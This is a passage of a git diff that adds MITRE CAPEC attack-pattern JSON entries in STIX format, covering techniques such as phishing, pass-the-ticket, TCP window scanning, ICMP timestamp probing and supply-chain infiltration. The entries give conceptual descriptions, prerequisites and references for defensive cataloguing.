Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-147" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Other" + ] + }, + "x_capec_example_instances": [ + "An adversary sends an ICMP type 13 Timestamp Request to determine the time as recorded by a remote target. Timestamp Replies, ICMP Type 14, usually return a value in Greenwich Mean Time. An adversary can attempt to use an ICMP Timestamp requests to 'ping' a remote system to see if is alive. Additionally, because these types of messages are rare they are easily spotted by intrusion detection systems, many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 13 and egress ICMP type 14 messages.", + "An adversary may gather the system time or time zone from a local or remote system. This information may be gathered in a number of ways, such as with Net on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. The information could be useful for performing other techniques, such as executing a file with a Scheduled Task, or to discover locality information based on time zone to assist in victim targeting" + ], + "x_capec_prerequisites": [ + "The ability to send a timestamp request to a remote target and receive a response." + ], + "x_capec_resources_required": [ + "Scanners or utilities that provide the ability to send custom ICMP queries." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b6de4b50-add8-494c-8fe2-6f2ec52cf7d3.json b/capec/attack-pattern/attack-pattern--b6de4b50-add8-494c-8fe2-6f2ec52cf7d3.json new file mode 100644 index 0000000000..d71ff0993c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b6de4b50-add8-494c-8fe2-6f2ec52cf7d3.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--39a28dbd-4667-4bca-a8f5-9d62b149cab9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b6de4b50-add8-494c-8fe2-6f2ec52cf7d3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Passively Sniffing and Capturing Application Code Bound for an Authorized Client During Dynamic Update", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-65 : Sniff Application Code\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/258.html", + "external_id": "CAPEC-258" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b7261469-6a57-41f7-9801-2c5d162a3529.json b/capec/attack-pattern/attack-pattern--b7261469-6a57-41f7-9801-2c5d162a3529.json new file mode 100644 index 0000000000..623d8a0e10 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b7261469-6a57-41f7-9801-2c5d162a3529.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--525ce281-951b-4907-889f-b71d194907a2", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b7261469-6a57-41f7-9801-2c5d162a3529", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Fuzzing for garnering J2EE/.NET-based stack traces, for application mapping", + "description": "An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes any stack traces produced by error messages. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to cause the targeted application to return an error including a stack trace, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. The stack trace enumerates the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/214.html", + "external_id": "CAPEC-214" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html", + "external_id": "CWE-209" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/388.html", + "external_id": "CWE-388" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The target application must fail to sanitize incoming messages adequately before processing and must generate a stack trace in at least some error situations." + ], + "x_capec_resources_required": [ + "The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the stack trace produced by the target application. Fuzzing tools, which automatically generate and send message variants, are necessary for this attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b7cf7ff6-4fc9-45c9-87a1-7bc92cbc05a8.json b/capec/attack-pattern/attack-pattern--b7cf7ff6-4fc9-45c9-87a1-7bc92cbc05a8.json new file mode 100644 index 0000000000..187a702a21 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b7cf7ff6-4fc9-45c9-87a1-7bc92cbc05a8.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--b571cae9-5fd0-4dbe-a36f-ff61b4522320", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b7cf7ff6-4fc9-45c9-87a1-7bc92cbc05a8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-04-26T00:00:00.000Z", + "modified": "2018-04-26T00:00:00.000Z", + "name": "Malicious Root Certificate", + "description": "An adversary exploits a weakness in authorization and installs a new root certificate on a compromised system. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/479.html", + "external_id": "CAPEC-479" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the ability to create a new root certificate." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b8999ae1-3c86-4808-93ca-adce94d9e197.json b/capec/attack-pattern/attack-pattern--b8999ae1-3c86-4808-93ca-adce94d9e197.json new file mode 100644 index 0000000000..89a3672aa4 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b8999ae1-3c86-4808-93ca-adce94d9e197.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--a6d88a5d-e11c-415e-afbc-4ca060eb51f6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b8999ae1-3c86-4808-93ca-adce94d9e197", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "Mobile Phishing", + "description": "An attacker targets mobile phone users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Mobile Phishing is a variation on the Phishing social engineering technique where the attack is initiated via mobile texting rather than email. The user is enticed to provide information or go to a compromised web site via a text message. Apart from the manner in which the attack is initiated, the attack proceeds as a standard Phishing attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/164.html", + "external_id": "CAPEC-164" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "MobPhishing" + ], + "x_capec_prerequisites": [ + "Attacker needs mobile phone numbers to initiate the connection. The attacker must guess an area of interest for the mobile user to entice them to follow the link provided in the text message. The attacker must have a replicated web site as in a normal Phishing attack." + ], + "x_capec_resources_required": [ + "Either mobile phone or access to a web resource that allows text messages to be sent to mobile phones. Resources needed for regular Phishing attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b8b2ecb9-de19-49b3-a596-0d97839395ec.json b/capec/attack-pattern/attack-pattern--b8b2ecb9-de19-49b3-a596-0d97839395ec.json new file mode 100644 index 0000000000..d08fae6df8 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b8b2ecb9-de19-49b3-a596-0d97839395ec.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--f27f9407-83cc-476d-b9d4-ee1222911816", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b8b2ecb9-de19-49b3-a596-0d97839395ec", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Use of Captured Tickets (Pass The Ticket)", + "description": "An adversary uses stolen Kerberos tickets to access systems that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/645.html", + "external_id": "CAPEC-645" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html", + "external_id": "CWE-522" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs physical access to the victim system.", + "The use of a third-party credential harvesting tool." + ], + "x_capec_skills_required": { + "High": "The adversary uses a third-party tool to obtain the necessary tickets to execute the attack.", + "Low": "Determine if Kerberos authentication is used on the server." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b96ebe51-105b-4b19-990a-adeb6336a84a.json b/capec/attack-pattern/attack-pattern--b96ebe51-105b-4b19-990a-adeb6336a84a.json new file mode 100644 index 0000000000..23dfceb406 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b96ebe51-105b-4b19-990a-adeb6336a84a.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--edcba58d-9216-4046-951b-7f692afb0b92", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b96ebe51-105b-4b19-990a-adeb6336a84a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Phishing", + "description": "Phishing is a social engineering technique where an attacker masquerades as a legitimate entity with which the victim might do business in order to prompt the user to reveal some confidential information (very frequently authentication credentials) that can later be used by an attacker. Phishing is essentially a form of information gathering or \"fishing\" for information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/98.html", + "external_id": "CAPEC-98" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "John gets an official looking e-mail from his bank stating that his or her account has been temporarily locked due to suspected unauthorized activity and that John needs to click on the link included in the e-mail to log in to his bank account in order to unlock it. The link in the e-mail looks very similar to that of his bank and once the link is clicked, the log in page is the exact replica. John supplies his login credentials after which he is notified that his account has now been unlocked and that everything is fine. An attacker has just collected John's online banking information which can now be used by him or her to log into John's bank account and transfer John's money to a bank account of the attackers' choice." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An attacker needs to have a way to initiate contact with the victim. Typically that will happen through e-mail.", + "An attacker needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \"hooks\" to many potential victims.", + "An attacker needs to have a sufficiently compelling call to action to prompt the user to take action.", + "The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity." + ], + "x_capec_resources_required": [ + "Some web development tools to put up a fake website." + ], + "x_capec_skills_required": { + "Medium": "Basic knowledge about websites: obtaining them, designing and implementing them, etc." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b9d78d34-9cd8-473d-8d7c-858c35487b02.json b/capec/attack-pattern/attack-pattern--b9d78d34-9cd8-473d-8d7c-858c35487b02.json new file mode 100644 index 0000000000..36496d9a8e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b9d78d34-9cd8-473d-8d7c-858c35487b02.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--5cf311d8-91ba-44b8-b3dc-078736ff7f2e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b9d78d34-9cd8-473d-8d7c-858c35487b02", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Voice in NLP", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/432.html", + "external_id": "CAPEC-432" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ba3ec386-76ed-49d9-8257-a4c3a772d6c1.json b/capec/attack-pattern/attack-pattern--ba3ec386-76ed-49d9-8257-a4c3a772d6c1.json new file mode 100644 index 0000000000..2dd67b7da9 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ba3ec386-76ed-49d9-8257-a4c3a772d6c1.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--2b6a8b4b-4b4e-4b56-9be9-e6b135b3b09a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ba3ec386-76ed-49d9-8257-a4c3a772d6c1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Excavation", + "description": "An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes. This is achieved by exploring the target via ordinary interactions for the purpose of gathering intelligence about the target, or by sending data that is syntactically invalid or non-standard in an attempt to produce a response that contains the desired data. As a result of these interactions, the adversary is able to obtain information from the target that aids the attacker in making inferences about its security, configuration, or potential vulnerabilities. Examplar exchanges with the target may trigger unhandled exceptions or verbose error messages that reveal information like stack traces, configuration information, path information, or database design. This type of attack also includes the manipulation of query strings in a URI to produce invalid SQL queries, or by trying alternative path values in the hope that the server will return useful information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/116.html", + "external_id": "CAPEC-116" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An adversary requires some way of interacting with the system." + ], + "x_capec_resources_required": [ + "A tool, such as a MITM Proxy or a fuzzer, that is capable of generating and injecting custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ba8669e5-9f73-4900-9a19-7b24486fe8d6.json b/capec/attack-pattern/attack-pattern--ba8669e5-9f73-4900-9a19-7b24486fe8d6.json new file mode 100644 index 0000000000..5683c5325d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ba8669e5-9f73-4900-9a19-7b24486fe8d6.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--03ea2ee1-2055-4161-8508-f2111041cd2b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ba8669e5-9f73-4900-9a19-7b24486fe8d6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Force Use of Corrupted Files", + "description": "This describes an attack where an application is forced to use a file that an attacker has corrupted. The result is often a denial of service caused by the application being unable to process the corrupted file, but other results, including the disabling of filters or access controls (if the application fails in an unsafe way rather than failing by locking down) or buffer overflows are possible.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/263.html", + "external_id": "CAPEC-263" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html", + "external_id": "CWE-829" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The targeted application must utilize a configuration file that an attacker is able to corrupt. In some cases, the attacker must be able to force the (re-)reading of the corrupted file if the file is normally only consulted at startup.", + "The severity of the attack hinges on how the application responds to the corrupted file. If the application detects the corruption and locks down, this may result in the denial of services provided by the application. If the application fails to detect the corruption, the result could be a more severe denial of service (crash or hang) or even an exploitable buffer overflow. If the application detects the corruption but fails in an unsafe way, this attack could result in the continuation of services but without certain security structures, such as filters or access controls. For example, if the corrupted file configures filters, an unsafe response from an application could result in simply disabling the filtering mechanisms due to the lack of usable configuration data." + ], + "x_capec_resources_required": [ + "This varies depending on the resources necessary to corrupt the configuration file and the resources needed to force the application to re-read it (if any)." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--babc06ac-cf59-44cd-9f4a-d50771d486df.json b/capec/attack-pattern/attack-pattern--babc06ac-cf59-44cd-9f4a-d50771d486df.json new file mode 100644 index 0000000000..3a7c437396 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--babc06ac-cf59-44cd-9f4a-d50771d486df.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--a8a674b6-008a-4e21-8d02-60853533fe5b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--babc06ac-cf59-44cd-9f4a-d50771d486df", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Blockage", + "description": "An adversary blocks the delivery of an important system resource causing the system to fail or stop working.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/603.html", + "external_id": "CAPEC-603" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Other (Blocking a resource from functional operation denies its availability to authorized users.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "This attack pattern requires knowledge of where important system resources are logically located as well as how they operate." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--bae38550-a769-4b9a-9f24-9325b6c8f0ca.json b/capec/attack-pattern/attack-pattern--bae38550-a769-4b9a-9f24-9325b6c8f0ca.json new file mode 100644 index 0000000000..571d155e3e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--bae38550-a769-4b9a-9f24-9325b6c8f0ca.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--2360c208-5d51-44df-9d0c-f61f58a30170", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--bae38550-a769-4b9a-9f24-9325b6c8f0ca", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Degradation", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/602.html", + "external_id": "CAPEC-602" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--baf43188-0192-457d-af9d-8ef7bce09a94.json b/capec/attack-pattern/attack-pattern--baf43188-0192-457d-af9d-8ef7bce09a94.json new file mode 100644 index 0000000000..b4415ca4e6 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--baf43188-0192-457d-af9d-8ef7bce09a94.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--6fe10619-4113-47ed-a6d9-38f4cc41df8b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--baf43188-0192-457d-af9d-8ef7bce09a94", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Infiltration of Hardware Development Environment", + "description": "An attacker, leveraging the ability to manipulate components of primary support systems and tools within the development and production environments, inserts malicious software within the hardware and/or firmware development environment. The infiltration purpose is to alter developed hardware components in a system destined for deployment at the victim's organization, for the purpose of disruption or further compromise.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/537.html", + "external_id": "CAPEC-537" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/125.html", + "external_id": "CWE-125" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "The attacker, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for hardware and/or firmware design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent hardware development system from the manufacturer's workstation. The attacker is then able to exfiltrate and alter sensitive data on the hardware system, allowing for future compromise once the developed system is deployed at the victim location." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).", + "The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.", + "The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure." + ], + "x_capec_skills_required": { + "High": "Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)", + "Medium": "Intelligence about the manufacturer's operating environment and infrastructure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--bb06f756-3def-454b-bf89-ee8ed5203179.json b/capec/attack-pattern/attack-pattern--bb06f756-3def-454b-bf89-ee8ed5203179.json new file mode 100644 index 0000000000..036cb38232 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--bb06f756-3def-454b-bf89-ee8ed5203179.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--12b0c057-bb2e-4c71-ac49-c9d638fc9c4e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--bb06f756-3def-454b-bf89-ee8ed5203179", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Window Scan", + "description": "An adversary engages in TCP Window scanning to analyze port status and operating system type. TCP Window scanning uses the ACK scanning method but examine the TCP Window Size field of response RST packets to make certain inferences. While TCP Window Scans are fast and relatively stealthy, they work against fewer TCP stack implementations than any other type of scan. Some operating systems return a positive TCP window size when a RST packet is sent from an open port, and a negative value when the RST originates from a closed port. TCP Window scanning is one of the most complex scan types, and its results are difficult to interpret. Window scanning alone rarely yields useful information, but when combined with other types of scanning is more useful. It is a generally more reliable means of making inference about operating system versions than port status.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/306.html", + "external_id": "CAPEC-306" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "TCP Window scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges." + ], + "x_capec_resources_required": [ + "The ability to send TCP segments with a custom window size to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--bb90461b-f233-44ef-b09e-bc6af67a7796.json b/capec/attack-pattern/attack-pattern--bb90461b-f233-44ef-b09e-bc6af67a7796.json new file mode 100644 index 0000000000..536f2ed5d8 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--bb90461b-f233-44ef-b09e-bc6af67a7796.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--ea471a67-8b79-4a42-a622-57a0aaa2bf12", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--bb90461b-f233-44ef-b09e-bc6af67a7796", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Malicious Manual Software Update", + "description": "An attacker introduces malicious code to the victim's system by altering the payload of a software update, allowing for additional compromise or site disruption at the victim location. These manual, or user-assisted attacks, vary from requiring the user to download and run an executable, to as streamlined as tricking the user to click a URL. Attacks which aim at penetrating a specific network infrastructure often rely upon secondary attack methods to achieve the desired impact. Spamming, for example, is a common method employed as an secondary attack vector. Thus the attacker has in his or her arsenal a choice of initial attack vectors ranging from traditional SMTP/POP/IMAP spamming and its varieties, to web-application mechanisms which commonly implement both chat and rich HTML 